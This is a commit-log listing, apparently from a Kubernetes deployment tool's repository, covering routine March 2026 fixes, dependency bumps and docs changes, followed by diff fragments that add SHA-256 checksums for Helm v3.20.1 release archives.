Sinhyeok Seo	382c507beb	fix(server): Cache glob patterns to improve RBAC evaluation performance (#25759 ) Signed-off-by: Sinhyeok Seo <sinhyeok@gmail.com> Signed-off-by: Sinhyeok Seo <44961659+Sinhyeok@users.noreply.github.com>	2026-03-17 10:22:23 -04:00
dependabot[bot]	8142920ab8	chore(deps): bump library/redis from `1c054d5` to `a019c00` in /test/container (#26865 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-17 07:08:27 -04:00
Blake Pettersson	47a0746851	chore(renovate): group aws-sdk-v2-updates (#26848 ) Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>	2026-03-17 11:39:00 +02:00
Regina Voloshin	13cd517470	docs: move releases to Tuesdays (#26859 ) Signed-off-by: reggie-k <regina.voloshin@codefresh.io>	2026-03-16 18:27:47 +02:00
Christopher Coco	63a009effa	fix(test): make fail message better for TestAuthReconcileWithMissingNamespace (#26856 ) Signed-off-by: Christopher Coco <ccoco@redhat.com>	2026-03-16 03:13:40 -10:00
github-actions[bot]	5a6c83229b	chore: Bump version in master (#26855 ) Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> Co-authored-by: reggie-k <19544836+reggie-k@users.noreply.github.com>	2026-03-16 14:44:45 +02:00
dependabot[bot]	f409135f17	chore(deps): bump softprops/action-gh-release from 2.5.0 to 2.6.1 (#26838 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-16 13:00:58 +02:00
				`@@ -0,0 +1 @@`
				`580515b544d5c966edc6f782c9ae88e21a9e10c786a7d6c5fd4b52613f321076 helm-v3.20.1-darwin-amd64.tar.gz`
				`@@ -0,0 +1 @@`
				`75cc96ac3fe8b8b9928eb051e55698e98d1e026967b6bffe4f0f3c538a551b65 helm-v3.20.1-darwin-arm64.tar.gz`
				`@@ -0,0 +1 @@`
				`0165ee4a2db012cc657381001e593e981f42aa5707acdd50658326790c9d0dc3 helm-v3.20.1-linux-amd64.tar.gz`
				`@@ -0,0 +1 @@`
				`56b9d1b0e0efbb739be6e68a37860ace8ec9c7d3e6424e3b55d4c459bc3a0401 helm-v3.20.1-linux-arm64.tar.gz`
				`@@ -0,0 +1 @@`
				`77b7d9bc62b209c044b873bc773055c5c0d17ef055e54c683f33209ebbe8883c helm-v3.20.1-linux-ppc64le.tar.gz`
				`@@ -0,0 +1 @@`
				`3c43d45149a425c7bf15ba3653ddee13e7b1a4dd6d4534397b6f317f83c51b58 helm-v3.20.1-linux-s390x.tar.gz`